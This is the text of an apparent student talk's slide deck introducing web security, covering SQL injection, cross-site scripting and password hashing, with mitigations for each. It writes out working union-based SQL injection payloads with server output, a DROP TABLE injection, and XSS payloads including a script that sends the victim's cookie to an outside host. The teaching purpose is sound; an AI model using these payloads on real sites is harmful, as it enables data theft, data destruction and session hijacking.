Introduction to Web Security

Introduction to Web Security YEUK HON WONG @jwxie CUNY City
College

Code • All code can be found in https://github.com/yeukhon/websec-poc

I am one of you. Undergraduate in CS. Took CSC
480 with wes in spring. Mozilla Application Security intern in summer 2013.

Security is hard: No shit. Developers are users too. We
have the right to understand security and be aware of the state of the art.

BIGGER PICTURE: “World's Biggest Data Breaches & Hacks visualization” -
http://www.informationisbeautiful.net/visualizations/worlds- biggest-data-breaches-hacks/

OWASP Top 10 Lists top 10 application security vulnerability every
three years.

OWASP Top 10 https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

This talk o SQL Injection o Cross-site scripting (XSS) o
Password management

Risks of SQL Injection • Remains as #1 in the
OWASP Top 10. • Financial and trust loss: – Sensitive data leakage – DoDs attack (usually in form of data loss)

SQL injection in the news

How SQL injection works?

How SQL injection works? GET /users?id=1 GET /users?id=1 SELECT *
FROM users WHERE id = 1; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),) ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),) GET /users?id=1 GET /users?id=1 and 1=1 and 1=1 SELECT * FROM users WHERE id = 1 and 1=1; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),) ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'),) GET /users?id=1 GET /users?id=1 and 1=2 and 1=2 SELECT * FROM users WHERE id = 1 and 1=2; None None GET /users?id=1; DROP TABLE users; GET /users?id=1; DROP TABLE users; SELECT * FROM users WHERE id = 1; DROP TABLE users;

Complex SELECT attr1, attr2 FROM users; SELECT * FROM ranks;
SELECT percentage FROM progress; In principle, some of the attrs don't have to be visible to the frontend! attr1 may never be shown to us in the frontend.

Basic usage of SQL Injections Attacker: 1. /users?id=<id_num> is exploitable
2. Wants to steal some sensitive data from some table. (Could be a different table or the same table) Tools: 1. error-based attack, and 2. union-based attack.

UNION UNION combines two SQL queries into a single table
of matching rows. Name Amount Alice 100 Bob 101 Name Amount Calvin 102 Derek 103 SELECT * FROM table1 SELECT * FROM table1 UNION UNION SELECT * FROM table2; SELECT * FROM table2; Name Amount Alice 100 Bob 101 Name Amount Alice 100 Bob 101 Calvin 102 Derek 103

Step 1: Number of attributes Attacker has to find out
the number of attributes returned by the SELECT <?> FROM <table>; query.The following tells us there are more than one attributes are returned. GET /users?id=1 UNION ALL SELECT 1 GET /users?id=1 UNION ALL SELECT 1 SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1; 500 Internal Server Error: 500 Internal Server Error: OperationalError: (1222, 'The used SELECT statements have a different OperationalError: (1222, 'The used SELECT statements have a different number of columns') number of columns')

Step 1: Number of attributes Attacker has to find out
the number of attributes returned by the SELECT <?> FROM <table>; query.The following tells us there are more than one attributes are returned. GET /users?id=1 UNION ALL SELECT 1,2 GET /users?id=1 UNION ALL SELECT 1,2 SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1,2; 500 Internal Server Error: 500 Internal Server Error: OperationalError: (1222, 'The used SELECT statements have a different OperationalError: (1222, 'The used SELECT statements have a different number of columns') number of columns')

Step 1: Number of attributes In this case we know
there are three attributes returned. That's good enough; the attacker doesn't need to know there are exactly or more than three attributes in a table. GET /users?id=1 UNION ALL SELECT 1,2,3 GET /users?id=1 UNION ALL SELECT 1,2,3 SELECT * FROM users WHERE id = 1 UNION ALL SELECT 1,2,3; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8') ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8')

Step 2: Find a table to query The attacker also
doesn't know what tables are available in a database. To do this, find out the version. In this case, this is a MySQL 5.5.34 server. GET /users?id=1 UNION ALL SELECT @@version,2,3 GET /users?id=1 UNION ALL SELECT @@version,2,3 SELECT * FROM users WHERE id = 1 UNION ALL @@version 1,2,3; (('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), (('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ('5.5.34-0ubuntu0.12.04.1', '2', '3')) ('5.5.34-0ubuntu0.12.04.1', '2', '3'))

Step 2: Find a table to query For MySQL >
5, we can do this to find tables: GET /users?id=1 UNION SELECT 1, 2, table_name FROM information_schema.tables GET /users?id=1 UNION SELECT 1, 2, table_name FROM information_schema.tables SELECT * FROM users WHERE id = 1 UNION SELECT 1,2, table_name FROM information_schema.tables; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), (1L, '2', 'CHARACTER_SETS'), (1L, '2', 'COLLATIONS'), (1L, '2', 'CHARACTER_SETS'), (1L, '2', 'COLLATIONS'), (1L, '2', 'COLLATION_CHARACTER_SET_APPLICABILITY'), (1L, '2', 'COLLATION_CHARACTER_SET_APPLICABILITY'), ….. ….. (1L, '2', 'setup_timers'), (1L, '2', 'threads'), (1L, '2', 'exercises'), (1L, '2', 'users')) (1L, '2', 'setup_timers'), (1L, '2', 'threads'), (1L, '2', 'exercises'), (1L, '2', 'users'))

Step 3: Find columns in a table We are targeting
at exercises, find all its columns? GET /users?id=1 UNION SELECT 1, 2, column_name FROM information_schema.columns GET /users?id=1 UNION SELECT 1, 2, column_name FROM information_schema.columns SELECT * FROM users WHERE id = 11 UNION SELECT 1, 2, column_name FROM information_schema.columns; ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ((1L, 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), (1L, '2', 'CHARACTER_SET_NAME'), (1L, '2', 'CHARACTER_SET_NAME'), (1L, '2', 'DEFAULT_COLLATE_NAME') (1L, '2', 'DEFAULT_COLLATE_NAME') ….. ….. ((1L, '2', 'exercise_name'), (1L, '2', 'exercises')) ((1L, '2', 'exercise_name'), (1L, '2', 'exercises'))

Step 3: Get exercises out We know there is a
second table exercises and we know some interesting columns... Bonus: imagine legitimate query never asks for the hash, we can use UNION to look for the hash :) GET /users?id=1 UNION SELECT exercise_name, null, null from exercises GET /users?id=1 UNION SELECT exercise_name, null, null from exercises UNION SELECT exercise_name, null, null from exercises; (('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), (('1', 'yeukhon', '5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8'), ('exercise_name_1', None, None)) ('exercise_name_1', None, None))

Mitigations • Sanitize user inputs. Escape. • Don't construct SQL
queries by string concatenations • If you have to, somehow, use parameterize function provided by the database driver. This is usually known as the “prepared” statement. • Use ORM. (Rail, Django ORM, SQLAlchemy are good)

Cross-site scripting (XSS)

XSS • XSS deals with scripting – to be exact
Javascript, HTML and CSS. • I consider this the most common, the cheapest vulnerability. – Personal, school and corporate websites are almost always vulnerable.

Risks of XSS • Loading malicious code. • Phishing attacks
– Iframe attack – Clickjacking • Redirect attack • Cookie stealing

Types of XSS • Reflected XSS – Injecting Javascript into
a URL • Stored/Persistent XSS – Injected Javascript is loaded from database • DOM-based XSS – Rewrite DOM using either method from above

Reflected XSS • Attacker injects some script (JS, HTML or
CSS) and the input is reflected in the URL and in the document.

HTML with Reflected XSS Input <h1> This is some h1
title </h1> into the search bar. GET /xss?search=%3Ch1%3EThis+is+some+h1+title%3C%2Fh1%3E GET /xss?search=%3Ch1%3EThis+is+some+h1+title%3C%2Fh1%3E

Iframe with Reflected XSS We can create an iframe in
the current document. GET /xss?search=<iframe src="http:/192.168.33.60:8080" GET /xss?search=<iframe src="http:/192.168.33.60:8080" height="100%" width="30%"></iframe> height="100%" width="30%"></iframe>

Redirect with Reflected XSS On loading the document we can
tell the DOM to jump to another website. Attacker can create a forged login page and make victim think he or she is still on the legitimate login page. GET /xss?search=<script>document.location.href=" GET /xss?search=<script>document.location.href="http://google.com http://google.com" " </script> </script>

Cookie Stealing with Reflected XSS Under browser's Same Origin Policy,
we can make GET request. Attacker make a request to attacker's url in the background using XSS and append cookie to the request. GET /xss?search=<script> GET /xss?search=<script> xhr=new XMLHttpRequest(); xhr=new XMLHttpRequest(); xhr.open("GET","http://192.168.33.60:8081/?cookie=" + xhr.open("GET","http://192.168.33.60:8081/?cookie=" + document.cookie,true); document.cookie,true); xhr.send();</script> xhr.send();</script>

Stored XSS Inject code into the database, the application doesn't
escape the output so browser reads the code as it is (like valid HTML). This is much more serious – imagine someone posted a comment with XSS in a bulletin board.

XSS Mitigations 1. Sanitize input code by means of escaping
characters. For example use JSON to serialize input and output. 2. Cookies should be set to secure only flag and HTTPS only. So stealing cookies using XSS is not possible. 3. Avoid running arbitrary user code in HTML. For example, don't turn off safe string in Django's template. 4. Add Content-Security-Policy which prevents inline script and style.

Password

Hashing algorithms • Cryptographically strong hashing algorithms • Fast hashing
vs work-factor hashing • MD5 – broken • SHA family (use SHA2) • Bcrypt vs scrypt vs PBKDF2

Cost to break

Don't ask for password Even big companies get it wrong...
Adopt Mozilla Persona....

Questions? @jwxie github.com/yeukhon speakerdeck.com/yeukhon

:p Thank you!

Introduction to Web Security

Introduction to Web Security

More Decks by yeukhon

Other Decks in Programming

Featured

Transcript